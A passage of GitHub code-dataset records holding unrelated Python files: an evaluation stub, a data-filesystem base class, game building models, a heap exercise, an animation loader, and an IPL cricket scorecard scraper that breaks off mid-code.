\"\"\"get average precision\"\"\"\n # put 1 here just to avoid bugs\n average_precision = 1\n\n return average_precision\n\n","repo_name":"yanghou2000/Panoptic-Segmentation","sub_path":"utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995701606","text":"import collections\nimport re\n\nimport six\n\nfrom mlsnippet.utils import maybe_close, DocInherit, AutoInitAndCloseable\nfrom .errors import UnsupportedOperation, DataFileNotExist\n\n__all__ = [\n 'DataFSCapacity',\n 'DataFS',\n]\n\n\nclass DataFSCapacity(object):\n \"\"\"\n Enumeration class to represent the capacity of a :class:`DataFS`.\n\n There are 7 different categories of capacities. Every method of\n :class:`DataFS` may only work if the :class:`DataFS` has the\n particular one or more capacities. One may check whether the\n :class:`DataFS` has a certain capacity by ``can_[capacity_name]()``.\n \"\"\"\n\n __slots__ = ('_mode',)\n\n READ_DATA = 0x1\n \"\"\"Can read file data, the basic capacity of a :class:`DataFS`.\"\"\"\n\n WRITE_DATA = 0x2\n \"\"\"Can write file data.\"\"\"\n\n READ_META = 0x4\n \"\"\"Can read meta data.\"\"\"\n\n WRITE_META = 0x8\n \"\"\"Can write meta data.\"\"\"\n\n LIST_META = 0x10\n \"\"\"Can enumerate the meta keys for a particular file.\"\"\"\n\n QUICK_COUNT = 0x20\n \"\"\"Can get the count of files without iterating through them.\"\"\"\n\n RANDOM_SAMPLE = 0x40\n \"\"\"Can randomly sample files without obtaining the whole file list.\"\"\"\n\n READ_WRITE_DATA = READ_DATA | WRITE_DATA\n \"\"\"Can read and write file data.\"\"\"\n\n READ_WRITE_META = READ_META | WRITE_META\n \"\"\"Can read and write meta data.\"\"\"\n\n ALL = (READ_WRITE_DATA | READ_WRITE_META | LIST_META |\n QUICK_COUNT | RANDOM_SAMPLE)\n \"\"\"All capacities are supported.\"\"\"\n\n def __init__(self, mode=0):\n \"\"\"\n Construct a new :class:`DataFSCapacity`.\n\n Args:\n mode (int): The mode number of this capacity flag.\n \"\"\"\n if isinstance(mode, DataFSCapacity):\n mode = mode._mode\n self._mode = int(mode)\n\n def can_read_data(self):\n return (self._mode & self.READ_DATA) != 0\n\n def can_write_data(self):\n return (self._mode & self.WRITE_DATA) != 0\n\n def can_read_meta(self):\n return (self._mode & self.READ_META) != 0\n\n def can_write_meta(self):\n return (self._mode & self.WRITE_META) != 0\n\n def can_list_meta(self):\n return (self._mode & self.LIST_META) != 0\n\n def can_quick_count(self):\n return (self._mode & self.QUICK_COUNT) != 0\n\n def can_random_sample(self):\n return (self._mode & self.RANDOM_SAMPLE) != 0\n\n def __repr__(self):\n pieces = []\n for flag in ('read_data', 'write_data', 'read_meta', 'write_meta',\n 'list_meta', 'quick_count', 'random_sample'):\n if getattr(self, 'can_{}'.format(flag))():\n pieces.append(flag)\n return '{}({})'.format(self.__class__.__name__, ','.join(pieces))\n\n def __eq__(self, other):\n return isinstance(other, DataFSCapacity) and self._mode == other._mode\n\n def __hash__(self):\n return hash(self._mode)\n\n\n@DocInherit\nclass DataFS(AutoInitAndCloseable):\n \"\"\"\n Base class for all data file systems.\n\n A :class:`DataFS` provides access to a machine learning dataset stored\n in a file system like backend. For example, large image datasets are\n usually stored as raw image files, gathered in a directory. Such true\n file system can be accessed by :class:`~mlsnippet.datafs.LocalFS`.\n\n Apart from the true file system, some may instead store these images in a\n database provided virtual file system, for example, the GridFS of MongoDB,\n which can be accessed via :class:`~mlsnippet.datafs.MongoFS`.\n \"\"\"\n\n _buffer_size = 65536\n \"\"\"The default buffer size for IO operations.\"\"\"\n\n _initialized = False\n \"\"\"Whether or not this :class:`DataFS` has been initialized?\"\"\"\n\n def __init__(self, capacity, strict=False):\n \"\"\"\n Initialize the base :class:`DataFS` class.\n\n Args:\n capacity (int or DataFSCapacity): Specify the capacity of the\n derived :class:`DataFS`.\n strict (bool): Whether or not this :class:`DataFS` works in\n strict mode? (default :obj:`False`)\n\n In strict mode, the following behaviours will take place:\n\n 1. Accessing the value of a non-exist meta key will cause\n a :class:`MetaKeyNotExist`, instead of getting :obj:`None`.\n \"\"\"\n self._capacity = DataFSCapacity(capacity)\n self._strict = strict\n\n @property\n def capacity(self):\n \"\"\"\n Get the capacity of this :class:`DataFS`.\n\n Returns:\n DataFSCapacity: The capacity object.\n \"\"\"\n return self._capacity\n\n @property\n def strict(self):\n \"\"\"Whether or not this :class:`DataFS` works in strict mode?\"\"\"\n return self._strict\n\n def as_flow(self, batch_size, with_names=True, meta_keys=None,\n shuffle=False, skip_incomplete=False, names_pattern=None):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, which iterates\n through the files once and only once in an epoch.\n\n The returned :class:`~mlsnippet.datafs.DataFSFlow` will hold a copy\n of this instance (obtained by :meth:`clone()`) instead of holding\n this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n shuffle (bool): Whether or not to shuffle the files in each\n epoch of the flow? Setting this to :obj:`True` will force\n loading the file list into memory. (default :obj:`False`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? (default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n names_pattern (None or str or regex): The file name pattern.\n If specified, only if the file name matches this pattern,\n would the file be included in the constructed data flow.\n Specifying this option will force loading the file list\n into memory. (default :obj:`None`)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n \"\"\"\n from .dataflow import DataFSForwardFlow, DataFSIndexedFlow\n\n # quick path: use forward flow if no shuffling and name filtering\n if not shuffle and names_pattern is None:\n return DataFSForwardFlow(\n fs=self.clone(),\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n skip_incomplete=skip_incomplete,\n )\n\n # slow path: load the names, then do filtering if required,\n # and use indexed flow to serve\n else:\n if names_pattern is None:\n names = self.list_names()\n else:\n names_pattern = re.compile(names_pattern)\n names = [n for n in self.iter_names() if names_pattern.match(n)]\n return DataFSIndexedFlow(\n fs=self.clone(),\n names=names,\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n shuffle=shuffle,\n skip_incomplete=skip_incomplete,\n )\n\n def sub_flow(self, batch_size, names, with_names=True, meta_keys=None,\n shuffle=False, skip_incomplete=False):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, which iterates\n through the files according to selected `names`.\n\n The returned :class:`~mlsnippet.datafs.DataFSFlow` will hold a copy\n of this instance (obtained by :meth:`clone()`) instead of holding\n this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n names (list[str] or np.ndarray[str]): The names to retrieve.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n shuffle (bool): Whether or not to shuffle the files in each\n epoch of the flow? Setting this to :obj:`True` will force\n loading the file list into memory. (default :obj:`False`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? (default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n \"\"\"\n from .dataflow import DataFSIndexedFlow\n return DataFSIndexedFlow(\n fs=self.clone(),\n names=names,\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n shuffle=shuffle,\n skip_incomplete=skip_incomplete,\n )\n\n def random_flow(self, batch_size, with_names=True, meta_keys=None,\n skip_incomplete=False, batch_count=None):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, with infinite\n or pre-configured number of mini-batches in an epoch, randomly\n sampled from the whole :class:`DataFS`.\n\n The returned :class:`~mlsnippet.datafs.DataFSRandomFlow` will hold\n a copy of this instance (obtained by :meth:`clone()`) instead of\n holding this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? (default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n batch_count (int or None): The number of mini-batches to obtain\n in an epoch. (default :obj:`None`, infinite mini-batches)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent.\n \"\"\"\n if not self.capacity.can_random_sample():\n raise UnsupportedOperation()\n from .dataflow import DataFSRandomFlow\n return DataFSRandomFlow(\n fs=self.clone(),\n with_names=with_names,\n meta_keys=meta_keys,\n batch_size=batch_size,\n batch_count=batch_count,\n skip_incomplete=skip_incomplete\n )\n\n def clone(self):\n \"\"\"\n Obtain a clone of this :class:`DataFS` instance.\n\n Returns:\n DataFS: The cloned :class:`DataFS`. Only the construction\n arguments will be copied. All the internal states\n (e.g., database connections) are kept un-initialized.\n \"\"\"\n raise NotImplementedError()\n\n def count(self):\n \"\"\"\n Count the files in this :class:`DataFS`.\n\n Will iterate through all the files via :meth:`iter_names()`, if\n ``QUICK_COUNT`` capacity is absent.\n\n Returns:\n int: The total number of files.\n \"\"\"\n # This is a fast way to count the items in an iterator.\n # https://github.com/wbolster/cardinality/blob/master/cardinality.py#L24\n d = collections.deque(enumerate(self.iter_names(), 1), maxlen=1)\n return d[0][0] if d else 0\n\n def iter_names(self):\n \"\"\"\n Iterate through all the file names in this :class:`DataFS`.\n\n Yields:\n str: The file name of each file.\n \"\"\"\n raise NotImplementedError()\n\n def list_names(self):\n \"\"\"\n Get the list of all the file names.\n\n Returns:\n list[str]: The file names list.\n \"\"\"\n return list(self.iter_names())\n\n def sample_names(self, n_samples):\n \"\"\"\n Sample ``n_samples`` file names from this :class:`DataFS`.\n\n Args:\n n_samples (int): Number of names to sample.\n The returned names may be fewer than this number,\n if there are less than ``n_samples`` files in this\n :class:`DataFS`.\n\n Returns:\n list[str]: The list of sampled file names.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def iter_files(self, meta_keys=None):\n \"\"\"\n Iterate through all the files in this :class:`DataFS`.\n\n Args:\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. (default :obj:`None`)\n\n Yields:\n (filename, content, [meta-data...]): A tuple containing the\n name of a file, its content, and the values of each meta\n data corresponding to ``meta_keys``. If a requested key\n is absent for a file, :obj:`None` will take the place.\n\n Raises:\n UnsupportedOperation: If ``meta_keys`` is specified, but\n ``READ_META`` capacity is absent.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n for name in self.iter_names():\n yield (name,) + self.retrieve(name, meta_keys)\n\n def sample_files(self, n_samples, meta_keys=None):\n \"\"\"\n Sample ``n_samples`` files from this :class:`DataFS`.\n\n Args:\n n_samples (int): The number of files to sample.\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. (default :obj:`None`)\n\n Returns:\n list[(filename, content, [meta-data...])]: A list of tuples,\n each tuple contains the name of a file, its content, and\n the values of each meta data corresponding to ``meta_keys``.\n If a requested key is absent for a file, :obj:`None` will\n take the place.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent,\n or ``meta_keys`` is specified, but ``READ_META`` capacity\n is absent.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n names = self.sample_names(n_samples)\n return [(name,) + self.retrieve(name, meta_keys) for name in names]\n\n def retrieve(self, filename, meta_keys=None):\n \"\"\"\n Retrieve the content and maybe meta data of a file.\n\n Args:\n filename (str): The name of the file to be retrieved.\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. (default :obj:`None`)\n\n Returns:\n bytes or (bytes, [meta-data...]): The content, or a tuple\n containing the content and the meta values, corresponding\n to ``meta_keys``. If a requested key is absent for a file,\n :obj:`None` will take the place.\n\n Notes:\n As long as ``meta_keys`` is not None, a tuple will always\n be returned, even if ``meta_keys`` is an empty collection.\n\n Raises:\n UnsupportedOperation: If ``meta_keys`` is specified, but\n ``READ_META`` capacity is absent.\n DataFileNotExist: If `filename` does not exist.\n \"\"\"\n if meta_keys is not None:\n meta_keys = tuple(meta_keys)\n return (self.get_data(filename),) + \\\n (meta_keys and self.get_meta(filename, meta_keys))\n else:\n return self.get_data(filename)\n\n def get_data(self, filename):\n \"\"\"\n Get the content of a file.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n bytes: The content of a file.\n DataFileNotExist: If `filename` does not exist.\n \"\"\"\n with maybe_close(self.open(filename, 'r')) as f:\n return f.read()\n\n def put_data(self, filename, data):\n \"\"\"\n Save the content of a file.\n\n Args:\n filename (str): The name of the file.\n data (bytes or file-like): The content of the file,\n or a file-like object with ``read(size)`` method.\n\n Raises:\n UnsupportedOperation: If ``WRITE_DATA`` capacity is absent.\n \"\"\"\n if isinstance(data, six.binary_type):\n with maybe_close(self.open(filename, 'w')) as f:\n f.write(data)\n elif hasattr(data, 'read'):\n with maybe_close(self.open(filename, 'w')) as f:\n while True:\n buf = data.read(self._buffer_size)\n if not buf:\n break\n f.write(buf)\n else:\n raise TypeError('`data` must be bytes or a file-like object.')\n\n def open(self, filename, mode):\n \"\"\"\n Open a file-like object to read / write a file.\n\n Args:\n filename (str): The name of the file.\n mode ({'r', 'w'}): The open mode of the file, either 'r' for\n reading or 'w' for writing. Other modes are not supported\n in general.\n\n Returns:\n file-like: The file-like object. This object will be immediately\n closed as soon as this :class:`DataFS` instance is closed.\n\n Raises:\n InvalidOpenMode: If the specified mode is not supported,\n e.g., ``mode == 'w'`` but ``WRITE_DATA`` capacity is absent.\n DataFileNotExist: If ``mode == 'r'`` but `filename` does not exist.\n \"\"\"\n raise NotImplementedError()\n\n def isfile(self, filename):\n \"\"\"\n Check whether or not a file exists.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n bool: :obj:`True` if ``filename`` exists and is a file,\n and :obj:`False` otherwise.\n \"\"\"\n raise NotImplementedError()\n\n def batch_isfile(self, filenames):\n \"\"\"\n Check whether or not the files exist.\n\n Args:\n filenames (Iterable[str]): The names of the files.\n\n Returns:\n list[bool]: A list of indicators, where :obj:`True` if the\n corresponding ``filename`` exists and is a file, and\n :obj:`False` otherwise.\n \"\"\"\n return [self.isfile(filename) for filename in filenames]\n\n def list_meta(self, filename):\n \"\"\"\n List the meta keys of a file.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n tuple[str]: The keys of the meta data of the file.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``LIST_META`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def get_meta(self, filename, meta_keys):\n \"\"\"\n Get meta data of a file.\n\n Args:\n filename (str): The name of the file.\n meta_keys (Iterable[str]): The keys of the meta data.\n\n Returns:\n tuple[any]: The meta values, corresponding to ``meta_keys``.\n If a requested key is absent for a file, :obj:`None` will\n take the place.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``READ_META`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def batch_get_meta(self, filenames, meta_keys):\n \"\"\"\n Get meta data of files.\n\n Args:\n filenames (Iterable[str]): The names of the files.\n meta_keys (Iterable[str]): The keys of the meta data.\n\n Returns:\n list[tuple[any] or None]: A list of meta values, or :obj:`None`\n if the corresponding file does not exist.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n ret = []\n for name in filenames:\n try:\n ret.append(self.get_meta(name, meta_keys))\n except DataFileNotExist:\n ret.append(None)\n return ret\n\n def get_meta_dict(self, filename):\n \"\"\"\n Get all the meta data of a file, as a dict.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n dict[str, any]: The meta values, as a dict.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``READ_META`` or ``LIST_META``\n capacity is absent.\n \"\"\"\n meta_keys = self.list_meta(filename)\n meta_values = self.get_meta(filename, meta_keys)\n return {k: v for k, v in zip(meta_keys, meta_values)}\n\n def put_meta(self, filename, meta_dict=None, **meta_dict_kwargs):\n \"\"\"\n Update the meta data of a file. The un-mentioned meta data will\n remain unchanged. This method is not necessarily faster than\n :meth:`clear_and_put_meta`. In some backends it may be implemented\n by first calling :class:`get_meta_dict`, then updating the meta dict\n in memory, and finally calling :class:`clear_and_put_meta`.\n\n Args:\n filename (str): The name of the file.\n meta_dict (dict[str, any]): The meta values to be updated.\n **meta_dict_kwargs: The meta values to be updated, as keyword\n arguments. This will override the values provided in\n ``meta_dict``.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``READ_META`` capacity) is(are) absent.\n \"\"\"\n raise NotImplementedError()\n\n def clear_and_put_meta(self, filename, meta_dict=None, **meta_dict_kwargs):\n \"\"\"\n Set the meta data of a file. The un-mentioned meta data will be\n cleared. This method is not necessarily slower than :meth:`put_meta`.\n\n Args:\n filename (str): The name of the file.\n meta_dict (dict[str, any]): The meta values to be updated.\n **meta_dict_kwargs: The meta values to be updated, as keyword\n arguments. This will override the values provided in\n ``meta_dict``.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``LIST_META`` capacity) is(are) absent.\n \"\"\"\n self.clear_meta(filename)\n self.put_meta(filename, meta_dict, **meta_dict_kwargs)\n\n def clear_meta(self, filename):\n \"\"\"\n Clear all the meta data of a file.\n\n Args:\n filename (str): The name of the file.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``LIST_META`` capacity) is(are) absent.\n \"\"\"\n raise NotImplementedError()\n","repo_name":"haowen-xu/mlsnippet","sub_path":"mlsnippet/datafs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":24149,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72291016486","text":"\"\"\"Provides the BuildingType and Building classes.\"\"\"\n\nfrom datetime import datetime\n\nfrom sqlalchemy import Column, Integer, ForeignKey, Boolean\nfrom sqlalchemy.orm import relationship\n\nfrom .base import (\n Base, NameMixin, CoordinatesMixin, ResistanceMixin, LocationMixin,\n OwnerMixin, ResourcesMixin, TypeMixin, SoundMixin, MaxHealthMixin,\n HealthMixin, GetNameMixin\n)\n\n\nclass BuildingRecruit(Base, ResourcesMixin):\n \"\"\"Provides a link betwene building and unit types, allowing buildings\n to provide units. Resources are used during reruitment.\"\"\"\n\n __tablename__ = 'building_recruits'\n building_type_id = Column(\n Integer, ForeignKey('building_types.id'), nullable=False\n )\n unit_type_id = Column(\n Integer, ForeignKey('unit_types.id'), nullable=False\n )\n pop_time = Column(Integer, nullable=False, default=4)\n\n\nclass BuildingType(\n Base, NameMixin, ResistanceMixin, ResourcesMixin, SoundMixin,\n MaxHealthMixin\n):\n \"\"\"A type of building. Resources are used during construction.\"\"\"\n\n __tablename__ = 'building_types'\n depends_id = Column(\n Integer, ForeignKey('building_types.id'), nullable=True\n )\n depends = relationship(\n 'BuildingType', foreign_keys=[depends_id], backref='dependencies',\n remote_side='BuildingType.id'\n )\n recruits = relationship(\n 'UnitType', backref='recruiters', secondary=BuildingRecruit.__table__\n )\n landing_field = Column(Boolean, nullable=False, default=False)\n\n def get_pop_time(self, unit_type):\n \"\"\"Get the pop time for the given UnitType instance.\"\"\"\n return BuildingRecruit.one(\n building_type_id=self.id, unit_type_id=unit_type.id\n ).pop_time\n\n def set_pop_time(self, unit_type, value):\n \"\"\"Set the pop time for the given UnitType instance to the given\n value.\"\"\"\n BuildingRecruit.query(\n building_type_id=self.id, unit_type_id=unit_type.id\n ).update(\n {BuildingRecruit.pop_time: value}\n )\n\n def add_recruit(self, type, **resources):\n \"\"\"Add the given UnitType instance as a recruit of this building\n type. It will cost the provided resources to recruit.\"\"\"\n return BuildingRecruit(\n unit_type_id=type.id, building_type_id=self.id, **resources\n )\n\n def get_recruit(self, type):\n \"\"\"Return the BuildingRecruit instance that represents the given\n UnitType instance.\"\"\"\n return BuildingRecruit.one(\n building_type_id=self.id, unit_type_id=type.id\n )\n\n\nclass Building(\n Base, CoordinatesMixin, LocationMixin, OwnerMixin, TypeMixin,\n ResourcesMixin, HealthMixin, GetNameMixin\n):\n \"\"\"A building on a map. Resources are used for storage.\"\"\"\n\n __tablename__ = 'buildings'\n __type_class__ = BuildingType\n\n def add_skill(self, skill_type, activate=None):\n \"\"\"Add the given member of the SkillTypes enumeration to this\n building. If activate is None, it will be set to datetime.utcnow. The\n skill will not become active until that time.\"\"\"\n if activate is None:\n activate = datetime.utcnow()\n assert type(skill_type).__name__ == 'SkillTypes', \\\n 'Invalid value %r.' % skill_type\n Skill = Base._decl_class_registry['Skill']\n return Skill(\n building=self, skill_type=skill_type, activated_at=activate\n )\n\n @property\n def skill_types(self):\n Skill = Base._decl_class_registry['Skill']\n return [s.skill_type for s in Skill.query(building=self)]\n\n def has_skill(self, member):\n \"\"\"Given one of the members of the SkillTypes enumeration, return the\n number of skills of that type that are attached to this building.\"\"\"\n Skill = Base._decl_class_registry['Skill']\n return Skill.count(skill_type=member, building_id=self.id)\n\n def get_full_name(self):\n if self.owner is None:\n owner = 'Unclaimed'\n else:\n owner = str(self.owner)\n return f'{self.get_name()} ({owner})'\n","repo_name":"chrisnorman7/pyrts","sub_path":"server/db/buildings.py","file_name":"buildings.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35828646684","text":"from heapq import *\n\nclass SmallestKElements:\n\n\t@staticmethod\n\tdef smallestKElements(arr, k):\n\t\tmax_heap = []\n\t\t\n\t\tfor i in range(len(arr)):\n\t\t\theappush(max_heap, -arr[i])\n\t\t\tif(len(max_heap) == k + 1):\n\t\t\t\theappop(max_heap)\n\t\t\n\t\tans = []\n\t\t\n\t\twhile max_heap:\n\t\t\tans.append(-heappop(max_heap))\n\n\t\treturn ans\n\nif __name__ == '__main__':\n\tarr = [1, 4, 5, 3, 7, 8, 6, 10]\n\tk = 3\n\tans = SmallestKElements.smallestKElements(arr, k)\n\tfor a in ans:\n\t\tprint(a, end = \" \")","repo_name":"aakashverma1124/Interview-Preparation-Python","sub_path":"priorityqueue/SmallestKElements.py","file_name":"SmallestKElements.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"10698316807","text":"from fife import fife\nfrom fife.extensions.serializers import ET\n\ndef loadXMLAnimation(engine, filename):\n\tf = engine.getVFS().open(filename)\n\tf.thisown = 1\n\n\timgMgr = engine.getImageManager()\n\t\n\ttree = ET.parse(f)\n\tnode = tree.getroot()\n\n\tanimation = fife.Animation.createAnimation()\n\t\n\tcommon_frame_delay = int(node.get('delay', 0))\n\tx_offset = int(node.get('x_offset', 0))\n\ty_offset = int(node.get('y_offset', 0))\n\tanimation.setActionFrame(int(node.get('action', 0)))\n\n\tframes = node.findall('frame')\n\tif not frames:\n\t\traise InvalidFormat('animation without s')\n\n\tfor frame in frames:\n\t\tsource = frame.get('source')\n\t\tif not source:\n\t\t\traise InvalidFormat('animation without s')\n\n\t\tframe_x_offset = int(frame.get('x_offset', x_offset))\n\t\tframe_y_offset = int(frame.get('y_offset', y_offset))\n\t\tframe_delay = int(frame.get('delay', common_frame_delay))\n\n\t\t# xml paths are relative to the directory of the file they're used in.\n\t\tpath = filename.split('/')\n\t\tpath.pop()\n\t\tpath.append(str(source))\n\n\t\timage_file = '/'.join(path)\n\n\t\timg = imgMgr.create(image_file)\n\t\timg.setXShift(frame_x_offset)\n\t\timg.setYShift(frame_y_offset)\n\t\t\n\t\tanimation.addFrame(img, frame_delay)\n\t\t\n#\t\tanimation.thisown = 0\n\treturn animation\n\n","repo_name":"karottenreibe/FIFE","sub_path":"engine/python/fife/extensions/serializers/xmlanimation.py","file_name":"xmlanimation.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13847572437","text":"from bs4 import BeautifulSoup\r\nfrom pathlib import Path\r\nimport requests\r\nimport re\r\nimport csv\r\n# Method to write into csvfile\r\ndef csv_write(row):\r\n csv_path = 'C:\\\\Users\\\\Soumya\\\\ipl_data_2018.csv'\r\n ipl_data_file = Path(csv_path)\r\n if ipl_data_file.is_file():\r\n with open(csv_path, 'a') as csvFile:\r\n writer = csv.writer(csvFile)\r\n writer.writerow(row)\r\n csvFile.close()\r\n else:\r\n with open(csv_path, 'w') as data_file:\r\n pass\r\n data_file.close()\r\n with open(csv_path, 'a') as csvFile:\r\n writer = csv.writer(csvFile)\r\n writer.writerow(row)\r\n csvFile.close()\r\nif __name__ == '__main__':\r\n url = [\"https://en.wikipedia.org/wiki/2008_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2009_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2010_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2011_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2012_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2013_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2014_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2015_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2016_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2017_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2018_Indian_Premier_League\"]\r\n # url = [\"https://en.wikipedia.org/wiki/2016_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2017_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2018_Indian_Premier_League\"]\r\n for i in range(0,len(url),1):\r\n r = requests.get(url[i])\r\n data = r.text\r\n soup = BeautifulSoup(data,'lxml')\r\n soup.prettify()\r\n # Initialization\r\n data = list()\r\n urls = list()\r\n rr_list = list()\r\n rr_overs = list()\r\n player_of_match =\"\"\r\n pom_team = \"\"\r\n umpire = \"\"\r\n reserve_umpire=\"\"\r\n match_data_holder = list()\r\n row = list()\r\n c=0\r\n Match_data = dict()\r\n # Writing Headers first\r\n if i == 0:\r\n row = ['Field_umpire1','Field_umpire2','TV_umpire','Reserve_umpire','Referee','Match','Team1','Team2','Team1_score','Team1_overs','Team1_RR','Team2_score','Team2_overs','Team2_RR','Venue','Schedule','Result','Player_of_match','Player_of_match_team','Toss','Season']\r\n csv_write(row)\r\n row.clear()\r\n # Fetching Scorecard from above url\r\n for links in soup.find_all('a',text='Scorecard'):\r\n c +=1 # Just a counter for no of matches in a season\r\n data = str(links).split(\" \") # Splitting the scorecard hyperlink, as we need the text under href tag\r\n urls = str(data[3]).split('\\\"') # The third part is our scorecard hyperlink for each matches in a season\r\n urlss = urls[1].replace(\"/game/\",\"/scorecard/\") # Replacing the url's game to scorecard, as wiki fetches the game\r\n if urlss.find(\"/398829\") < 0: # We don't want to include the warm up match played in SA between Rajasthan Royals and Cape Cobras\r\n open_site = requests.get(urlss) # We now open the webpage through hyperlink for scapping content\r\n site_data = open_site.text # we get all the data as form of text from the website\r\n soup_class = BeautifulSoup(site_data,'lxml') # we now use beautifulsoup function to parse on the text returned\r\n # We start to get the text from the tags \r\n for datum in soup_class.find_all('div',attrs={'class': 'cscore_info-overview','data-reactid':'20'}):\r\n # Here we are fetching the two teams for the current match\r\n for team1 in soup_class.find_all('span',attrs={'class': 'cscore_name cscore_name--long','data-reactid':'28'}):\r\n team1 = team1.text\r\n for team2 in soup_class.find_all('span',attrs={'class': 'cscore_name cscore_name--long','data-reactid':'37'}):\r\n team2 = team2.text\r\n # Getting result\r\n for result in soup_class.find_all('span',attrs={'class': 'cscore_notes_game'}):\r\n result = result.text\r\n # print (result)\r\n # Fetching Player of the match\r\n for pom in soup_class.find_all('a',attrs={'class': 'gp__cricket__player-match__player__detail__link','data-reactid':'53'}):\r\n if '&lpos=cricket:game:scorecard:player' in str(pom):\r\n # For older ipl seasons this works\r\n pom = str(pom).split(\"&lpos=cricket:game:scorecard:player\\\">\")\r\n else:\r\n # For recent season this works\r\n pom = str(pom).split(\"&lpos=cricket:game:game:player\\\">\")\r\n pom_player = str(pom[1]).split(\"\")\r\n player_of_match = pom_player[0]\r\n pom_team = str(pom_player[1]).split(\"\")[0]\r\n # Fetching team1 score. This team is the one who batted first.\r\n for find_team1_score in soup_class.find_all('div',attrs={'class': 'cscore_score','data-reactid':'31'}):\r\n team1_score = find_team1_score.text\r\n # Fetching team2 score. This team bats second.\r\n for find_team2_score in soup_class.find_all('div',attrs={'class': 'cscore_score','data-reactid':'40'}):\r\n team2_score = find_team2_score.text\r\n # Finding Field Umpires for the match\r\n for find_field_umpires in soup_class.find_all('h4',text='Umpires'):\r\n field_umpires = str(find_field_umpires).split('\\\"')[1]\r\n field_umpires = int(field_umpires)\r\n field_umpires += 1\r\n for single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(field_umpires)}):\r\n umpire = single_umpire.text\r\n umpire = umpire.split(\" 